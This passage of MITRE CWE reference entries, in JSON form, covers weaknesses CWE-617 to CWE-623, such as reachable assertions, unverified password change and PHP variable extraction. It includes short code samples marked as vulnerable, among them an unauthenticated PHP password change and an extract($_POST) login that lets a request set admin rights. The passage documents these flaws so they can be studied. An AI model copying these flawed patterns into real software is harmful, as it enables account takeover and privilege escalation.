Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"617":{"attr":{"@_ID":"617","@_Name":"Reachable Assertion","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product contains an assert() or similar statement that can be triggered by an attacker, which leads to an application exit or other behavior that is more severe than necessary.","Extended_Description":{"xhtml:p":["While assertion is good for catching logic errors and reducing the chances of reaching more serious vulnerability conditions, it can still lead to a denial of service.","For example, if a server handles multiple simultaneous connections, and an assert() occurs in one single connection that causes all other connections to be dropped, this is a reachable assertion that leads to a denial of service."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Alternate_Terms":{"Alternate_Term":{"Term":"assertion failure"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"An attacker that can trigger an assert statement can still lead to a denial of service if the relevant code can be triggered by an attacker, and if the scope of the assert() extends beyond the attacker\'s own session."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Make sensitive open/close operation non reachable by directly user-controlled data (e.g. open/close resources)"},{"Phase":"Implementation","Strategy":"Input Validation","Description":"Perform input validation on user data."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the excerpt below, an AssertionError (an unchecked exception) is thrown if the user hasn\'t entered an email address in an HTML form.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String email = request.getParameter(\\"email_address\\");assert email != null;","xhtml:br":""}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-6767","Description":"FTP server allows remote attackers to cause a denial of service (daemon abort) via crafted commands which trigger an assertion failure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6767"},{"Reference":"CVE-2006-6811","Description":"Chat client allows remote attackers to cause a denial of service (crash) via a long message string when connecting to a server, which causes an assertion failure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6811"},{"Reference":"CVE-2006-5779","Description":"Product allows remote attackers to cause a denial of service (daemon crash) via LDAP BIND requests with long authcid names, which triggers an assertion failure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5779"},{"Reference":"CVE-2006-4095","Description":"Product allows remote attackers to cause a denial of service (crash) via certain queries, which cause an assertion failure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4095"},{"Reference":"CVE-2006-4574","Description":"Chain: security monitoring product has an off-by-one error that leads to unexpected length values, triggering an assertion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4574"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET01-J","Entry_Name":"Never use assertions to validate method arguments"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Alternate_Terms"}]}},"618":{"attr":{"@_ID":"618","@_Name":"Exposed Unsafe ActiveX Method","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"An ActiveX control is intended for use in a web browser, but it exposes dangerous methods that perform actions that are outside of the browser\'s security model (e.g. the zone or domain).","Extended_Description":"ActiveX controls can exercise far greater control over the operating system than typical Java or javascript. Exposed methods can be subject to various vulnerabilities, depending on the implemented behaviors of those methods, and whether input validation is performed on the provided arguments. If there is no integrity checking or origin validation, this method could be invoked by attackers.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"749","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"If you must expose a method, make sure to perform input validation on all arguments, and protect against all possible vulnerabilities."},{"Phase":"Architecture and Design","Description":"Use code signing, although this does not protect against any weaknesses that are already in the control."},{"Phase":["Architecture and Design","System Configuration"],"Description":"Where possible, avoid marking the control as safe for scripting."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-1120","Description":"download a file to arbitrary folders.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1120"},{"Reference":"CVE-2006-6838","Description":"control downloads and executes a url in a parameter","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6838"},{"Reference":"CVE-2007-0321","Description":"resultant buffer overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0321"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-503"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 12, &#34;ActiveX Security&#34;, Page 749"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Relationships"}]}},"619":{"attr":{"@_ID":"619","@_Name":"Dangling Database Cursor (\'Cursor Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"If a database cursor is not closed properly, then it could become accessible to other users while retaining the same privileges that were originally assigned, leaving the cursor \\"dangling.\\"","Extended_Description":"For example, an improper dangling cursor could arise from unhandled exceptions. The impact of the issue depends on the cursor\'s role, but SQL injection attacks are commonly possible.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"402","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary","Description":"This could be primary when the programmer never attempts to close the cursor when finished with it."},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"SQL","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"A cursor is a feature in Oracle PL/SQL and other languages that provides a handle for executing and accessing the results of SQL queries."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This issue is currently reported for unhandled exceptions, but it is theoretically possible any time the programmer does not close the cursor at the proper time."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Close cursors immediately after access to them is complete. Ensure that you close cursors if exceptions occur."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-505"}},{"attr":{"@_External_Reference_ID":"REF-506"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Background_Details, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Dangling Database Cursor (Cursor Injection)","attr":{"@_Date":"2008-04-11"}},{"#text":"Dangling Database Cursor (aka \'Cursor Injection\')","attr":{"@_Date":"2009-05-27"}}]}},"620":{"attr":{"@_ID":"620","@_Name":"Unverified Password Change","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"When setting a new password for a user, the product does not require knowledge of the original password, or using another form of authentication.","Extended_Description":"This could be used by an attacker to change passwords for another user, thus gaining the privileges associated with that user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"When prompting for a password change, force the user to provide the original password in addition to the new password."},{"Phase":"Architecture and Design","Description":"Do not use \\"forgotten password\\" functionality. But if you must, ensure that you are only providing information to the actual user, e.g. by using an email address or challenge question that the legitimate user already provided in the past; do not allow the current user to change this identity information until the correct password has been provided."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-56"},"Intro_Text":"This code changes a user\'s password.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$user = $_GET[\'user\'];$pass = $_GET[\'pass\'];$checkpass = $_GET[\'checkpass\'];if ($pass == $checkpass) {}","xhtml:br":["","",""],"xhtml:div":{"#text":"SetUserPassword($user, $pass);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"While the code confirms that the requesting user typed the same new password twice, it does not confirm that the user requesting the password change is the same user whose password will be changed. An attacker can request a change of another user\'s password and gain control of the victim\'s account."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-0681","Description":"Web app allows remote attackers to change the passwords of arbitrary users without providing the original password, and possibly perform other unauthorized actions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0681"},{"Reference":"CVE-2000-0944","Description":"Web application password change utility doesn\'t check the original password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0944"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP31","Entry_Name":"Missing authentication"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 19: Use of Weak Password-Based Systems.&#34; Page 279"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"}]}},"621":{"attr":{"@_ID":"621","@_Name":"Variable Extraction Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses external input to determine the names of variables into which information is extracted, without verifying that the names of the specified variables are valid. This could cause the program to overwrite unintended variables.","Extended_Description":{"xhtml:p":["For example, in PHP, extraction can be used to provide functionality similar to register_globals, a dangerous functionality that is frequently disabled in production systems. Calling extract() or import_request_variables() without the proper arguments could allow arbitrary global variables to be overwritten, including superglobals.","Similar functionality is possible in other interpreted languages, including custom languages."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"914","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"471","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Variable overwrite"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"An attacker could modify sensitive data or program variables."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Use allowlists of variable names that can be extracted."},{"Phase":"Implementation","Description":"Consider refactoring your code to avoid extraction routines altogether."},{"Phase":"Implementation","Description":"In PHP, call extract() with options such as EXTR_SKIP and EXTR_PREFIX_ALL; call import_request_variables() with a prefix argument. Note that these capabilities are not present in all PHP versions."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-107"},"Intro_Text":"This code uses the credentials sent in a POST request to login a user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function login($user,$pass){}$isAdmin = false;extract($_POST);login(mysql_real_escape_string($user),mysql_real_escape_string($pass));","xhtml:i":"//Log user in, and set $isAdmin to true if user is an administrator","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"$query = buildQuery($user,$pass);mysql_query($query);if(getUserRole($user) == \\"Admin\\"){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"$isAdmin = true;","attr":{"@_style":"margin-left:10px;"}}}}},"Body_Text":"The call to extract() will overwrite the existing values of any variables defined previously, in this case $isAdmin. An attacker can send a POST request with an unexpected third value \\"isAdmin\\" equal to \\"true\\", thus gaining Admin privileges."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-7135","Description":"extract issue enables file inclusion","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7135"},{"Reference":"CVE-2006-7079","Description":"extract used for register_globals compatibility layer, enables path traversal","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7079"},{"Reference":"CVE-2007-0649","Description":"extract() buried in include files makes post-disclosure analysis confusing; original report had seemed incorrect.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0649"},{"Reference":"CVE-2006-6661","Description":"extract() enables static code injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6661"},{"Reference":"CVE-2006-2828","Description":"import_request_variables() buried in include files makes post-disclosure analysis confusing","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2828"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"Notes":{"Note":{"#text":"Probably under-reported for PHP. Under-studied for other interpreted languages.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"622":{"attr":{"@_ID":"622","@_Name":"Improper Validation of Function Hook Arguments","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product adds hooks to user-accessible API functions, but it does not properly validate the arguments. This could lead to resultant vulnerabilities.","Extended_Description":"Such hooks can be used in defensive software that runs with privileges, such as anti-virus or firewall, which hooks kernel calls. When the arguments are not validated, they could be used to bypass the protection scheme or attack the product itself.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure that all arguments are verified, as defined by the API you are protecting."},{"Phase":"Architecture and Design","Description":"Drop privileges before invoking such functions, if possible."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-0708","Description":"DoS in firewall using standard Microsoft functions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0708"},{"Reference":"CVE-2006-7160","Description":"DoS in firewall using standard Microsoft functions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7160"},{"Reference":"CVE-2007-1376","Description":"function does not verify that its argument is the proper type, leading to arbitrary memory write","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1376"},{"Reference":"CVE-2007-1220","Description":"invalid syscall arguments bypass code execution limits","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1220"},{"Reference":"CVE-2006-4541","Description":"DoS in IDS via NULL argument","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4541"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP27","Entry_Name":"Tainted input to environment"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description"}],"Previous_Entry_Name":{"#text":"Unvalidated Function Hook Arguments","attr":{"@_Date":"2012-10-30"}}}},"623":{"attr":{"@_ID":"623","@_Name":"Unsafe ActiveX Control Marked Safe For Scripting","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An ActiveX control is intended for restricted use, but it has been marked as safe-for-scripting.","Extended_Description":"This might allow attackers to use dangerous functionality via a web page that accesses the control, which can lead to different resultant vulnerabilities, depending on the control\'s behavior.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"267","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"618","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"During development, do not mark it as safe for scripting."},{"Phase":"System Configuration","Description":"After distribution, you can set the kill bit for the control so that it is not accessible from Internet Explorer."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-0617","Description":"control allows attackers to add malicious email addresses to bypass spam limits","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0617"},{"Reference":"CVE-2007-0219","Description":"web browser uses certain COM objects as ActiveX","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0219"},{"Reference":"CVE-2006-6510","Description":"kiosk allows bypass to read files","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6510"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-503"}},{"attr":{"@_External_Reference_ID":"REF-510"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 16, &#34;What ActiveX Components Are Safe for Initialization and Safe for Scripting?&#34; Page 510"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 12, &#34;ActiveX Security&#34;, Page 749"}}]},"Notes":{"Note":{"#text":"It is suspected that this is 